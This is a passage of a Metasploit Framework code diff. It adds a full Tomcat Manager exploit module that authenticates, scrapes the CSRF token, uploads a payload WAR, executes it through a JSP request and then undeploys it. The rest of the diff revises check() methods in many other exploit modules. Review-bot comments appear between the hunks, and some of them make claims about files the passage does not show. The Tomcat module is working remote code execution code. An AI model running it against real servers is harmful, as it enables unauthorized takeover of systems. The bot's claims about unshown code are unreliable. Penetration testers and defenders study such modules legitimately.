jduck's tomcat_mgr_deploy. + # the tomcat_mgr_deploy o longer works for current versions of tomcat due to + # CSRF protection tokens. Also PUT requests against the /manager/html/deploy + # aren't allowed anymore. + + # There is no single vulnerability associated with deployment functionality. + # Instead, the focus has been on insecure/blank/hardcoded default passwords. 
+ + # The following references refer to HP Operations Manager + ['CVE', '2009-3843'], + ['OSVDB', '60317'], + ['CVE', '2009-4189'], + ['OSVDB', '60670'], + + # HP Operations Dashboard + ['CVE', '2009-4188'], + + # IBM Cognos Express Default user/pass + ['BID', '38084'], + ['CVE', '2010-0557'], + ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], + + # IBM Rational Quality Manager and Test Lab Manager + ['CVE', '2010-4094'], + ['ZDI', '10-214'], + + # 'admin' password is blank in default Windows installer + ['CVE', '2009-3548'], + ['OSVDB', '60176'], + ['BID', '36954'], + + # tomcat docs + ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] + ], + 'Platform' => %w{ java linux win }, # others? + 'Targets' => + [ + [ 'Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + } + ], + # + # Platform specific targets only + # + [ 'Windows Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'Linux x86', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 09 2009')) + + register_options( + [ + OptString.new('USERNAME', [false, 'The username to authenticate as']), + OptString.new('PASSWORD', [false, 'The password for the specified username']), + # /cognos_express/manager/ for Cognos Express (19300) + OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager']) + ], self.class) + end + + def check + res = query_manager + disconnect + + return CheckCode::Unknown if res.nil? 
+ + if res.code.between?(400, 499) + vprint_error("#{peer} - Server rejected the credentials") + return CheckCode::Unknown + end + + return CheckCode::Safe unless res.code == 200 + + # if res.code == 200 + # there should be access to the Tomcat Manager and to the status page + res = query_status + return CheckCode::Unknown unless res + + plat = detect_platform(res.body) + arch = detect_arch(res.body) + return CheckCode::Unknown unless plat and arch + + vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => (ssl ? "https" : "http"), + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", + :active => true + ) + + return CheckCode::Appears + end + + def exploit + @app_base = rand_text_alphanumeric(4 + rand(32 - 4)) + @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + + # + # Find the session ID and the CSRF token + # + print_status("#{peer} - Retrieving session ID and CSRF token...") + unless access_manager? + fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") + end + + # + # Upload Payload + # + print_status("#{peer} - Uploading and deploying #{@app_base}...") + if upload_payload + report_auth_info( + :host => rhost, + :port => rport, + :sname => (ssl ? "https" : "http"), + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], + :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", + :active => true + ) + else + fail_with(Failure::Unknown, "Upload failed") + end + + # + # Execute Payload + # + print_status("#{peer} - Executing #{@app_base}...") + unless execute_payload + fail_with(Failure::Unknown, "Failed to execute the payload") + end + + # + # Get the new CSRF token & session id + # + unless access_manager? 
+ fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") + end + + # + # Delete the deployed payload + # + print_status("#{peer} - Undeploying #{@app_base} ...") + unless undeploy_app + print_warning("#{peer} - Failed to undeploy #{@app_base}...") + end + end + + def query_status + path = normalize_uri(target_uri.path.to_s, 'status') + res = send_request_raw('uri' => path) + + unless res and res.code == 200 + vprint_error("Failed: Error requesting #{path}") + return nil + end + + return res + end + + def query_manager + path = normalize_uri(target_uri.path.to_s, '/html') + res = send_request_raw('uri' => path) + + return res + end + + def vars_get + vars = {} + unless @csrf_token.nil? + vars = { + "path" => @app_base, + "org.apache.catalina.filters.CSRF_NONCE" => @csrf_token + } + end + + return vars + end + + def detect_platform(body) + return nil if body.blank? + + i=0 + + body.each_line do |ln| + ln.chomp! + + i = 1 if ln =~ /OS Name/ + + if i == 9 or i == 11 + if ln.include? "Windows" + return 'win' + elsif ln.include? "Linux" + return 'linux' + elsif i==11 + return 'unknown' + end + end + + i = i+1 if i > 0 + end + end + + def detect_arch(body) + return nil if body.blank? + + i=0 + body.each_line do |ln| + ln.chomp! + + i = 1 if ln =~ /OS Architecture/ + + if i==9 or i==11 + if ln.include? 'x86' + return ARCH_X86 + elsif ln.include? 'i386' + return ARCH_X86 + elsif ln.include? 'i686' + return ARCH_X86 + elsif ln.include? 'x86_64' + return ARCH_X86 + elsif ln.include? 'amd64' + return ARCH_X86 + elsif i==11 + return 'unknown' + end + end + + i = i + 1 if i > 0 + end + end + + def find_csrf(res = nil) + return "" if res.blank? + + vprint_status("#{peer} - Finding CSRF token...") + + body = res.body + + body.each_line do |ln| + ln.chomp! + csrf_nonce = ln.index(CSRF_VAR) + next if csrf_nonce.nil? 
+ token = ln[csrf_nonce + CSRF_VAR.length, 32] + return token + end + + return "" + end + + def generate_multipart_msg(boundary, data) + # Rex::MIME::Message is breaking the binary upload when trying to + # enforce CRLF for SMTP compatibility + war_multipart = "-----------------------------" + war_multipart << boundary + war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\"" + war_multipart << @app_base + war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n" + war_multipart << data + war_multipart << "\r\n-----------------------------" + war_multipart << boundary + war_multipart << "--\r\n" + end + + def war_payload + payload.encoded_war({ + :app_name => @app_base, + :jsp_name => @jsp_name, + :arch => target.arch, + :platform => target.platform + }).to_s + end + + def send_war_payload(url, war) + boundary_identifier = rand_text_numeric(28) + + res = send_request_cgi({ + 'uri' => url, + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, + 'user' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'cookie' => @session_id, + 'vars_get' => vars_get, + 'data' => generate_multipart_msg(boundary_identifier, war), + }) + + return res + end + + def send_request_undeploy(url) + res = send_request_cgi({ + 'uri' => url, + 'vars_get' => vars_get, + 'method' => 'POST', + 'user' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'cookie' => @session_id + }) + + return res + end + + def access_manager? 
+ res = query_manager + return false unless res and res.code == 200 + @session_id = res.get_cookies + @csrf_token = find_csrf(res) + return true + end + + def upload_payload + war = war_payload + upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") + vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + res = send_war_payload(upload_path, war) + return parse_upload_response(res) + end + + def parse_upload_response(res) + unless res + vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + return false + end + + if res.code < 200 or res.code >= 300 + vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") + return false + end + + return true + end + + def execute_payload + jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") + + vprint_status("#{peer} - Executing #{jsp_path}...") + + res = send_request_cgi({ + 'uri' => jsp_path, + 'method' => 'GET' + }) + + return parse_execute_response(res) + end + + def parse_execute_response(res) + unless res + vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + return false + end + + if res and (res.code < 200 or res.code >= 300) + vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + return false + end + + return true + end + + def undeploy_app + undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy") + res = send_request_undeploy(undeploy_url) + + unless res + vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + return false + end + + if res and (res.code < 200 or res.code >= 300) + vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + return false + end + + return true + end + +end \ No newline at end of file 
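Review bot: `parse_upload_response` interpolates `upload_path` in both of its error messages, but that name is a local variable of `upload_payload`, so the first failed upload raises `NameError` instead of returning `false`; pass the path in as a parameter. `detect_platform` and `detect_arch` have a second problem: `String#each_line` returns the receiver, so when no `OS Name` / `OS Architecture` marker is found the methods return the whole status page rather than `nil`, and the `return CheckCode::Unknown unless plat and arch` guard in `check` never fires. Finally, both `report_auth_info` calls build `:proof` from `datastore['PATH']`, which nothing in this module registers (the option is `TARGETURI`), so the proof string always carries an empty path; `PATH=#{target_uri.path}` is what the requests actually use.
```ruby
  def detect_platform(body)
    return nil if body.blank?
    # … unchanged: each_line scan for the "OS Name" block …
    nil # String#each_line returns body itself, so be explicit when nothing matched
  end

  def detect_arch(body)
    return nil if body.blank?
    # … unchanged: each_line scan for the "OS Architecture" block …
    nil
  end

  def upload_payload
    # … unchanged: build war and upload_path …
    res = send_war_payload(upload_path, war)
    parse_upload_response(res, upload_path)
  end

  def parse_upload_response(res, upload_path)
    # … unchanged: nil and status-code checks, which now see upload_path …
  end
```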
diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index 6f23263acf..219a01a5d6 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /Powered by Traq 2.[0-3]/ ) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb index d8cffe813e..08f3f8db30 100644 --- a/modules/exploits/multi/http/uptime_file_upload.rb +++ b/modules/exploits/multi/http/uptime_file_upload.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 81bdaf39c2..54790d69ea 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -57,26 +57,26 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php') }) rescue - print_error("Unable to access the index.php file") + vprint_error("Unable to access the index.php file") return CheckCode::Unknown end if res and res.code != 200 - print_error("Error accessing the index.php file") + vprint_error("Error accessing the index.php file") return CheckCode::Unknown end if res.body =~ /

Powered by vtiger CRM - (.*)<\/div>/i - print_status("vTiger CRM version: " + $1) + vprint_status("vTiger CRM version: " + $1) case $1 when '5.4.0', '5.3.0' - return CheckCode::Vulnerable + return CheckCode::Appears else - return CheckCode::Safe + return CheckCode::Detected end end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index d196a3a4b3..bcccbb9c2a 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and res2 and res2.code == 200 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 53bc8c0528..57ec58c718 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -60,14 +60,14 @@ class Metasploit4 < Msf::Exploit::Remote }) if !init or init.code != 200 - print_error("Could not connect to server") + vprint_error("Could not connect to server") return Exploit::CheckCode::Unknown end if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/ if $1 >= "2.0.0" and $1 <= "2.0.8" - print_good("Version #{$1} is vulnerable.") - return Exploit::CheckCode::Vulnerable + vprint_good("Version #{$1} is vulnerable.") + return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index f25f4f19d4..a0155ef1ed 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb 
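Review bot: The guard `if res and res.code != 200` in the middle of the hunk lets a `nil` response through, and the very next statement, `res.body =~ /.../`, then raises `NoMethodError`; the `rescue` above only covers exceptions raised by `send_request_cgi`, not a `nil` return value. Change the guard to `if res.nil? or res.code != 200` so a missing response yields `CheckCode::Unknown` with the existing error message. The enclosing `check` starts outside the hunk.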
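Review bot: In the version branch the comparison `$1 >= "2.0.0"` is always true given the regex `/Zabbix (2\.0\.(\d)) Copyright/`, and `$1 <= "2.0.8"` is a string comparison that only works because the inner `(\d)` limits the patch level to a single digit; the captured `$2` is never used. Compare the digit directly, `if $2.to_i <= 8`, or use `Gem::Version.new($1) <= Gem::Version.new('2.0.8')` if the capture is ever widened to `\d+`. The enclosing `check` starts and ends outside the hunk.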
@@ -83,12 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if !(res and res.length > 0) - print_status("The remote service did not reply to our request") + vprint_status("The remote service did not reply to our request") return Exploit::CheckCode::Safe end if (res =~ /passwd|group|resolv/) - print_status("The remote service is exploitable") + vprint_status("The remote service is exploitable") return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index 886ac215f9..05c93f2e96 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote response = register(sock) if response =~ /463/ or response =~ /464/ - print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") + vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end response = join(sock) if not response =~ /353/ and not response =~ /366/ - print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") + vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return Exploit::CheckCode::Unknown end response = pbot_login(sock) diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index 3341f80160..9389a464b4 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote response = register(sock) if response =~ /463/ or response =~ /464/ - print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") + vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end 
diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index d802275f3f..b18a55f292 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - print_status("Checking for a vulnerable PHP version...") + vprint_status("Checking for a vulnerable PHP version...") # # Pick the URI and Cookie name @@ -226,14 +226,14 @@ class Metasploit3 < Msf::Exploit::Remote php_bug = false if (not res) - print_status("No response from the server") - return Exploit::CheckCode::Safe + vprint_status("No response from the server") + return Exploit::CheckCode::Unknown # User should try again end http_fingerprint({ :response => res }) # check method if (res.code != 200) - print_status("The server returned #{res.code} #{res.message}") + vprint_status("The server returned #{res.code} #{res.message}") return Exploit::CheckCode::Safe end 
@@ -246,29 +246,29 @@ class Metasploit3 < Msf::Exploit::Remote php_ver = php_raw.split('.') if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5) - print_status("The server runs a vulnerable version of PHP (#{php_raw})") + vprint_status("The server runs a vulnerable version of PHP (#{php_raw})") php_bug = true else - print_status("The server runs a non-vulnerable version of PHP (#{php_raw})") + vprint_status("The server runs a non-vulnerable version of PHP (#{php_raw})") return Exploit::CheckCode::Safe end end # Detect the phpBB cookie name if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) - print_status("The server may require a cookie name of '#{$1}_data'") + vprint_status("The server may require a cookie name of '#{$1}_data'") end if(target and target['Signature']) if (res.body and res.body.match(target['Signature'])) - print_status("Detected target #{target.name}") + vprint_status("Detected target #{target.name}") else - print_status("Did not detect target #{target.name}") + vprint_status("Did not detect target #{target.name}") end end - return php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears + return php_bug ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected end diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 328f86897c..0166bc45e2 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote info = http_fingerprint({ :response => res }) # check method / Custom server check if res and res['Server'] - print_status("Found RTSP: #{res['Server']}") + vprint_status("Found RTSP: #{res['Server']}") return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe 
diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index eb7f5454c0..8a7ac17992 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Exploit::Remote end if res and res.code == 200 and res.headers['Server'] =~ /gSOAP/ and res.body =~ /OSExecuteResponse/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res and res.code == 500 and (res.body =~ /Invalid Credentials/ or res.body =~ /Permission denied/) return Exploit::CheckCode::Detected elsif res and res.headers['Server'] =~ /gSOAP/ diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index d5ab61ad21..dc295f937a 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -85,9 +85,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check - end - def brute_exploit(addresses) connect diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 28f61b6c38..935ed14075 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb 
@@ -61,18 +61,18 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - print_status("Arkeia Server Information:") + vprint_status("Arkeia Server Information:") info.each_pair { |k,v| - print_status(" #{k + (" " * (30-k.length))} = #{v}") + vprint_status(" #{k + (" " * (30-k.length))} = #{v}") } if (info['System'] !~ /Darwin/) - print_status("This module only supports Mac OS X targets") + vprint_status("This module only supports Mac OS X targets") return Exploit::CheckCode::Detected end if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 5a43d1bd59..1f7a8b2f6b 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if not file?(datastore["Tunnelblick"]) - print_error "openvpnstart not found" + vprint_error "openvpnstart not found" return CheckCode::Safe end diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index d940379312..a7368c7b17 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if not file?(datastore["Viscosity"]) - print_error "ViscosityHelper not found" + vprint_error "ViscosityHelper not found" return CheckCode::Safe end diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index e4b92f24ca..0172023586 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb 
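Review bot: The padding expression on the new `vprint_status` line inside `info.each_pair`, `" " * (30-k.length)`, raises ArgumentError for any key longer than 30 characters, so one unexpectedly long key aborts `check` instead of letting it return a CheckCode; `info` looks like it is parsed from the server's reply, though the hunk does not show where it comes from. `String#ljust` produces the same layout for short keys and simply stops padding for long ones: `vprint_status(" #{k.ljust(30)} = #{v}")`. The enclosing `check` method starts outside the hunk.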
@@ -107,16 +107,16 @@ class Metasploit3 < Msf::Exploit::Local # check vn between 1.6.0 through 1.7.10p6 # and 1.8.0 through 1.8.6p6 if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) - print_error "sudo version #{sudo_vn} not vulnerable." + vprint_error "sudo version #{sudo_vn} not vulnerable." return Exploit::CheckCode::Safe end else - print_error "sudo not detected on the system." + vprint_error "sudo not detected on the system." return Exploit::CheckCode::Safe end if not user_in_admin_group? - print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." + vprint_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." return Exploit::CheckCode::Safe end # one root for you sir diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index 0cdca26ede..78acb267d1 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -56,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local def check stat = session.fs.file.stat(datastore["Nmap"]) if stat and stat.file? and stat.setuid? - print_good("#{stat.prettymode} #{datastore["Nmap"]}") + vprint_good("#{stat.prettymode} #{datastore["Nmap"]}") return CheckCode::Vulnerable end return CheckCode::Safe diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 56be38b558..60fbffab6f 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) - print_status("#{@peer} - Sending check") + vprint_status("#{@peer} - Sending check") connect req = "service launcher\n" req << "start/flags run /bin/echo /bin/echo #{fingerprint}\n" 
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res and res =~ /QCONN/ return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 63d47f8458..f0d80253af 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check connect banner = sock.get_once.strip - print_status("#{rhost}:#{rport} - Banner: #{banner}") + vprint_status("#{rhost}:#{rport} - Banner: #{banner}") disconnect # Vulnerable version info obtained from CVE diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 7529d55850..1d4cf75356 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - print_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 435677d479..0ac6810817 100644 
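Review bot: In qnx_qconn_exec the final `else` now returns `Exploit::CheckCode::Safe`, and because the `elsif` above it tests `res and res =~ /QCONN/`, a nil `res` (no reply) ends up reported as Safe rather than Unknown, which is the opposite of what this same commit does in php_unserialize_zval_cookie (`No response from the server` → Unknown, "User should try again"). The earlier branches of the chain are outside the hunk, so this assumes none of them handles a nil `res`; a guard ahead of the chain, `return Exploit::CheckCode::Unknown unless res`, keeps Safe for the "connected but not QCONN" case. instantcms_exec has the same shape, where `if res and res.body.match(...)` falls through to `Exploit::CheckCode::Safe` on a nil `res`.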
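Review bot: `if version > "10.0.10"` in arkeia_upload_exec compares version numbers as strings, so the comparison is lexicographic: `"10.0.9" > "10.0.10"` is true and a 10.0.9 install is reported Safe even though it is older than the fixed version. `Gem::Version.new(version) > Gem::Version.new("10.0.10")` compares numerically; `check` begins outside the hunk, so this assumes `version` holds the dotted string the log line suggests. The same string comparison appears in clipbucket_upload_exec, flashchat_upload_exec, foswiki_maketext, openemr_sqli_privesc_upload, openemr_upload_exec, php_wordpress_total_cache and spip_connect_exec in this change.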
--- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,12 +67,12 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe else - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 929f0f23c4..54994f0a79 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /Coppermine Picture Editor/i) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index e21e9f9294..da7be29e11 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index 08e9f91c85..020ff6a9d6 100644 
--- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,10 +71,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version found: #{version}") + vprint_status("#{peer} - Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif version <= "6.0.8" return Exploit::CheckCode::Detected else diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 2c62df9b48..a5b410086f 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -164,11 +164,11 @@ class Metasploit3 < Msf::Exploit::Remote if version <= "1.1.6" return Exploit::CheckCode::Appears else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 246d170d5a..16e14a3c94 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb 
